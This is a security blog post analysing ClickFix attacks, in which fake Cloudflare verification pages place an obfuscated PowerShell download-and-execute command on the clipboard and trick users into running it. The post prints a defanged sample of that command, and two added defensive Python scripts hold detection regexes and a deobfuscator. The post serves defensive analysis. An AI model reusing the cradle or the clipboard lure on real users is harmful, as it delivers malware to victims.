ClickFix Attacks

Although ClickFix attacks have been around since early 2024, it was only in late 2024 and early 2025 that the technique became popular, making it the 2nd most common attack vector after phishing. I'd heard of the technique but didn't really pay much attention to it until I was doing some Breach and Attack Simulation work, and one of the scenarios I was trying to emulate from a Threat Intel report mentioned it as the initial access vector.

In theory, it's a pretty simple but novel social engineering tactic: deceptive prompts trick the user into pasting and executing clipboard commands via the Windows Run dialog. In terms of setup, it's low cost and easily set up by threat actors looking for a quick win to compromise an end user's machine.

The most common technique used by threat actors is to mimic the Cloudflare verification service. Cloudflare is well known, so by impersonating a trusted brand the attackers are hoping that the on-screen message carries an air of legitimacy. Most users will have come across Cloudflare's verification screen on a legitimate website at some point, as it is often used where the web application owner wants to protect the site from automated bots. It's this familiarity that the attackers prey on, using a fake prompt that instructs the user to complete a series of actions as a second line of verification, which may not raise immediate suspicion.

The following screenshot is of a website using the aforementioned technique. Everything looks unsuspicious until you actually click within the verification square where it says "I'm not a robot".

Image 1 - Looks legit, right?

Once you click into this box, you're presented with a 2nd prompt:

Image 2 - Extra prompting to get you to verify for a 2nd time

What actually occurs is that when the user clicks the fake "I'm not a robot" checkbox, a hidden JavaScript function is triggered which copies a PowerShell or Command Prompt script into the clipboard without the user's knowledge.

If you were to follow the instructions on screen, the Windows Key + R combination opens the Windows Run dialog, Ctrl + V pastes whatever is in the clipboard into that dialog, and the dialog then runs whatever hidden command has been loaded onto the user's clipboard.
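One place the paste-and-run step leaves a trace is the Run dialog's own history, which Windows keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU as lettered values (each ending in `\1`) ordered by an MRUList value. The triage script below is an added example, not code from the original post: it reads a constructed export of that key (a dictionary standing in for the output of reg query or a winreg read) and flags entries that match several ClickFix-style indicators at once. The indicator list and the two-hit threshold are my own assumptions; the powershell entry is the defanged sample from this post and the two other entries are made up.

```python
import re

# Constructed export of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
# Windows stores each Run-dialog entry as a lettered REG_SZ value ending in "\1", and
# MRUList lists the letters from most to least recent. The powershell entry is the
# defanged sample from the post; "notepad" and "mstsc" are made-up benign entries.
SAMPLE_RUNMRU = {
    "MRUList": "bca",
    "a": r"notepad\1",
    "b": r"""powershell.exe -w h -nop -c "$kh='hxxp'+'s';"$b=':'+'//'+'alababababa'+'.'+'cloud'+'/';"$c='cVG'+'vQi'+'o6'+'.txt';"$om=$kh+$b+$c;$i='{0}{1}{2}' -f 'Net.','Web','Client';"$rf=New-Object ($i);$kj=$rf.('Download'+'String')($om);Invoke-Expression $kj"\1""",
    "c": r"mstsc\1",
}

# Indicators commonly seen in ClickFix one-liners (an assumed list, not from the post).
# The cradle and URL patterns only match text that has not been split with '+', so on
# the sample they stay silent while the string-splitting pattern fires. That is why
# several weak indicators are combined instead of relying on any single keyword.
INDICATORS = [
    ("interpreter", re.compile(r"^\s*(powershell|pwsh|cmd|mshta|wscript|cscript|curl|certutil|bitsadmin)(\.exe)?\b", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)),
    ("no_profile", re.compile(r"-nop(rofile)?\b", re.I)),
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b", re.I)),
    ("inline_eval", re.compile(r"Invoke-Expression|\biex\b", re.I)),
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("string_splitting", re.compile(r"'\s*\+\s*'|-f\s+'", re.I)),
    ("url", re.compile(r"h(tt|xx)ps?://", re.I)),
]


def parse_runmru(values):
    """Return (letter, command) pairs, most recent first, with the trailing \\1 removed."""
    entries = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        entries.append((letter, raw[:-2] if raw.endswith("\\1") else raw))
    return entries


def score_command(cmd):
    """Names of the indicators that match a single Run-dialog command."""
    return [name for name, rx in INDICATORS if rx.search(cmd)]


def triage_runmru(values, min_hits=2):
    """Flag Run-dialog entries that match at least min_hits indicators."""
    findings = []
    for letter, cmd in parse_runmru(values):
        hits = score_command(cmd)
        if len(hits) >= min_hits:
            findings.append({"value": letter, "indicators": hits, "command": cmd})
    return findings


if __name__ == "__main__":
    for finding in triage_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU\\{finding['value']}: {', '.join(finding['indicators'])}")
        print("  " + finding["command"][:100] + ("..." if len(finding["command"]) > 100 else ""))
```

On a live host the same logic applies to any source that records Run-dialog input or the resulting process command line (for example explorer.exe spawning powershell.exe); RunMRU is simply the artifact that survives when no process telemetry was being collected.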

As shown below, the hidden code copied onto the clipboard is an obfuscated PowerShell command, a common tactic used to hide malicious intent. This example, however, isn't heavily obfuscated, so it's easy enough to decipher.

```powershell
powershell.exe -w h -nop -c "$kh='hxxp'+'s';"$b=':'+'//'+'alababababa'+'.'+'cloud'+'/';"$c='cVG'+'vQi'+'o6'+'.txt';"$om=$kh+$b+$c;$i='{0}{1}{2}' -f 'Net.','Web','Client';"$rf=New-Object ($i);$kj=$rf.('Download'+'String')($om);Invoke-Expression $kj"
```

Breaking it down:

Essentially it uses PowerShell variables to hide the pieces of a command which will go to a URL, download a script and then attempt to run that script without it ever being written to disk. I've added a table below for clarification:

| Variable | Purpose | Example Value |
|----------|---------|---------------|
| $kh | Stores "https" | "https" |
| $b | Stores URL path (obfuscated) | "://alababababa.cloud/" |
| $c | Stores filename | "cVGvQio6.txt" |
| $om | Full URL = $kh + $b + $c | "https://alababababa.cloud/cVGvQio6.txt" |
| $i | Stores object type as string | "Net.WebClient" |
| $rf | Holds a new System.Net.WebClient object | Used to download |
| $kj | Contents of the downloaded script (actual malicious code) | |
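Rather than resolving the variables by hand, the concatenation and -f format tricks in this sample can be undone mechanically. The script below is an added example (not code from the post) that implements a minimal evaluator for exactly the constructs used here: single-quoted literals joined with +, the -f format operator, variable assignment, New-Object and the $obj.('method')(arg) call form. It drops the double quotes because this sample uses them only to split the -c argument into segments that the command-line parser rejoins; a script that relied on double-quoted strings would need real quote handling, which is out of scope here. The input is the defanged command from the post, so the recovered URL keeps its hxxps scheme.

```python
import re

# The defanged clipboard payload shown in the post, reproduced here as the sample input.
SAMPLE_CMDLINE = r"""powershell.exe -w h -nop -c "$kh='hxxp'+'s';"$b=':'+'//'+'alababababa'+'.'+'cloud'+'/';"$c='cVG'+'vQi'+'o6'+'.txt';"$om=$kh+$b+$c;$i='{0}{1}{2}' -f 'Net.','Web','Client';"$rf=New-Object ($i);$kj=$rf.('Download'+'String')($om);Invoke-Expression $kj" """

ASSIGN = re.compile(r"^\$(\w+)\s*=\s*(.*)$", re.S)           # $name = <expr>
METHOD = re.compile(r"^\$(\w+)\.\((.*)\)\((.*)\)$", re.S)    # $obj.('Meth'+'od')(arg)
NEWOBJ = re.compile(r"^New-Object\s*\(?\s*(.*?)\s*\)?$", re.I | re.S)


def split_top(text, sep):
    """Split text on sep, ignoring separators inside single- or double-quoted literals."""
    parts, start, i, quote = [], 0, 0, None
    while i < len(text):
        ch = text[i]
        if quote:
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif text.startswith(sep, i):
            parts.append(text[start:i])
            i += len(sep)
            start = i
            continue
        i += 1
    parts.append(text[start:])
    return [p.strip() for p in parts if p.strip()]


def extract_inline_script(cmdline):
    """Return the script passed via -c/-Command. Double quotes are dropped because this
    sample uses them only to split the argument into segments that are rejoined at parse time."""
    m = re.search(r"\s-c(?:ommand)?\s+(.*)$", cmdline, re.I | re.S)
    body = m.group(1) if m else cmdline
    return body.replace('"', "").strip()


def eval_expr(expr, env):
    """Evaluate a PowerShell string expression built from literals, +, -f and $variables."""
    expr = expr.strip()
    fmt_parts = split_top(expr, " -f ")
    if len(fmt_parts) == 2:
        fmt = eval_expr(fmt_parts[0], env)
        args = [eval_expr(a, env) for a in split_top(fmt_parts[1], ",")]
        try:
            return fmt.format(*args)  # PowerShell's {0}{1} placeholders match str.format
        except (IndexError, KeyError, ValueError):
            return expr
    terms = split_top(expr, "+")
    if len(terms) > 1:
        return "".join(eval_expr(t, env) for t in terms)
    if len(expr) >= 2 and expr[0] == expr[-1] and expr[0] in "'\"":
        return expr[1:-1]
    # Anything else: expand known $variables in place and leave the rest untouched.
    return re.sub(r"\$(\w+)", lambda m: env.get(m.group(1), m.group(0)), expr)


def deobfuscate(cmdline):
    """Walk the statements in order, resolving each variable to its plain-text value.
    Returns the final variable table and the calls the script would make, in order."""
    env, actions = {}, []
    for stmt in split_top(extract_inline_script(cmdline), ";"):
        m = ASSIGN.match(stmt)
        target, rhs = (m.group(1), m.group(2).strip()) if m else (None, stmt)
        if METHOD.match(rhs):
            obj, method, arg = METHOD.match(rhs).groups()
            value = f"({env.get(obj, '$' + obj)}).{eval_expr(method, env)}({eval_expr(arg, env)})"
            actions.append(value)
        elif NEWOBJ.match(rhs):
            value = "New-Object " + eval_expr(NEWOBJ.match(rhs).group(1), env)
        else:
            value = eval_expr(rhs, env)
        if target:
            env[target] = value
        else:
            actions.append(value)
    return {"variables": env, "actions": actions}


if __name__ == "__main__":
    result = deobfuscate(SAMPLE_CMDLINE)
    for name, value in result["variables"].items():
        print(f"${name} = {value}")
    for action in result["actions"]:
        print("ACTION:", action)
```

Running it on the sample reproduces the table above: $om resolves to the full (defanged) URL, $i to Net.WebClient, and the last recorded action is Invoke-Expression applied to the DownloadString result, which is the in-memory execution the post describes. Because the evaluator never executes anything, it is safe to point at clipboard contents or RunMRU entries recovered during an investigation.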

The domain featured in this example doesn't exist, so no text file is ever retrieved. My theory is that someone may have just been doing a proof of concept to see if they could actually get the webpage loading their malicious payload into the clipboard before attempting their real ClickFix campaign.

Further Research

At the time of writing there were over 554 results for potential ClickFix sites operating. This information was gathered from fofa.info. FOFA is a search engine for global cyberspace mapping belonging to Beijing Huashun Xin'an Technology Co., Ltd; it looks and feels very similar to Shodan.

The direct link to examine the results of the query string body="In the verification window, press <b>Ctrl</b>" is:
https://en.fofa.info/result?qbase64=Ym9keT0iSW4gdGhlIHZlcmlmaWNhdGlvbiB3aW5kb3csIHByZXNzIDxiPkN0cmw8L2I%2BIiA%3D